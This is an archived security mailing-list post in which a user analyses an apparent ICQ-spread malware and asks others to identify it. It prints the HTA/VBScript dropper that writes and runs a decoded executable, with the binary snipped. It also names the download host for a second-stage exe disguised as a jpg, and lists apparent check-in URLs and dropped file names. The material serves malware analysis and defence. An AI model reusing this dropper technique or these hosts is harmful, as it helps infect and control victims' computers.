lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list] 
From: security at astrobox.net (Michael Bemmerl)
Subject: New Virus?

Hi everybody!

Today I got an ICQ-Message from an user called "Monica" (Just search on ICQ:
http://people.icq.com/whitepages/search_results/1,,,00.html?FirstName=Moniqu
e&LastName=&NickName=Monica&Country=49). In her details is an URL:
http://www.rsngermany.com/my_foto.htm This is a fake 404-Error-Page, because
in the <head>-tags is a link to http://www.rsngermany.com/dn2.hta :

[HTML]
[HEAD]
[TITLE]Windows Update[/TITLE]
[HTA:APPLICATION ID="Q" APPLICATIONNAME="Q" BORDER="none"
BORDERSTYLE="normal" CAPTION="no" ICON="" CONTEXTMENU="no"
MAXIMIZEBUTTON="no" MINIMIZEBUTTON="no" SHOWINTASKBAR="no"
SINGLEINSTANCE="no" SYSMENU="no" VERSION="1.0" WINDOWSTATE="minimize"/]
[SCRIPT LANGUAGE="VBScript"]
MyFile = "q.vbs"
Set FSO = CreateObject("Scripting.FileSystemObject")
Set TSO = FSO.CreateTextFile(MyFile, True)
TSO.write "WScript.Sleep(50000)" & vbcrlf
TSO.write "szBinary = szBinary & ""4D5A...snip...0000000"" & szZeroLine" &
vbcrlf
TSO.write "szApplication = ""x.exe""" & vbcrlf
TSO.write "Set hFSO = CreateObject(""Scripting.FileSystemObject"")" & vbcrlf
TSO.write "Set hFile = hFSO.CreateTextFile(szApplication, ForWriting)" &
vbcrlf
TSO.write "intLength = len(szBinary)" & vbcrlf
TSO.write "intPosition = 1" & vbcrlf
TSO.write "while intPosition [ intLength" & vbcrlf
TSO.write "char = Int(""&H"" & Mid(szBinary, intPosition, 2))" & vbcrlf
TSO.write "hFile.Write(Chr(char))" & vbcrlf
TSO.write "intPosition = intPosition+2" & vbcrlf
TSO.write "wend" & vbcrlf
TSO.write "hFile.Close" & vbcrlf
TSO.write "Set hShell=CreateObject(""WScript.Shell"")" & vbcrlf
TSO.write "hShell.run(szApplication+"" ""+szURL)" & vbcrlf
TSO.close
Set TSO = Nothing
Set FSO = Nothing
# Dim WshShell
# Set WshShell = CreateObject("WScript.Shell")
# WshShell.Run "q.vbs", 0, false
[/SCRIPT]
[script]window.close()[/script]
[/HEAD]
[/html]

The .hta creates a file named q.vbs. That creates and runs x.exe. Notice the
unset parameter szURL in q.vbs (I asume that you can specify where to
download the next files - empty could mean that the files are loaded from
the coded location: http://rsngermany.com). The x.exe is FSG-packed; you can
upack it with Un-FSG! (just google for it). The file will download another
exe-File, tarned as jpg: http://www.rsngermany.com/3.jpg

I tested this exe with wine, it creates two files in the windows-dir.:
msreg.exe and fghy.exe (again packed with FSG) and two in system32:
svchostc.exe and svchosts.exe. Maybe it creates some run-entries in the
registry, but i couldn't test this. And it sends request to various domains:

All requests end in 404-Errors, except two (see end of list)
(replace * with d and f)

comdat.de/kreta/yif.php
www.dataforcecg.com/webvision/yi*.php
www.eurostretch.ru/yi*.php
www.hhc-online.de/home/links/pics/yi*.php
www.courie.ru/style/yi*.php
mucuc.h10.ru/forum/yi*.php
www.gran-pri.ru/yi*.php
www.mir-auto.ru/yi*.php
artesproduction.com/yif.php

comdat.de/kreta/yid.php  --> 301, redirection to comcat.de/kreta/zid.php
comdat.de/kreta/zid.php --> 200, just prints out your ip. Maybe the author
logs infected PC's
artesproduction.com/yid.php --> 200, again prints out the ip

The svchosts.exe has some HTTP-response-message for Error 400, 502 and 503

I tested the files with NAV2003, latest def., no infection.

Some ideas what it could be?

Greetings,
Michael

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ